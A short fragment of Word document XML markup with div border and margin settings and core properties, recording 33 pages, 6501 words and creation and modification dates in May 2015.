      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1347321640">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461071953">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15815552">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40080073">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 w:id="19759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ru-ru/library/ms190286.aspx"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2272AB-67C0-4612-8C21-4A66FA69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33</Pages>
  <Words>6501</Words>
  <Characters>37056</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43471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122</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-05-09T08:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-05-30T19:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>